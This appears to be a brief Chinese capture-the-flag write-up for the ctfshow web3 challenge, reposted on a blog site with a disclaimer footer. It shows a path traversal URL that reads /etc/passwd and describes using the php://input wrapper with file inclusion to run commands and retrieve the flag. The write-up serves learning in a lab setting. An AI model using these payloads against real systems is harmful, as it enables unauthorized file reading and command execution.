ctfshow—web—web3


打开靶机

 

 

 提示是文件包含漏洞

 

 测试成功

https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=../../../../../../../../../../etc/passwd

 

 此题考的是PHP伪协议+文件包含,实现任意命令执行

抓取数据包

https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=php://input

 

 开始试验,查询当前目录下的文件结构

 

 查看ctf_go_go_go文件内容

 

成功拿到flag


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM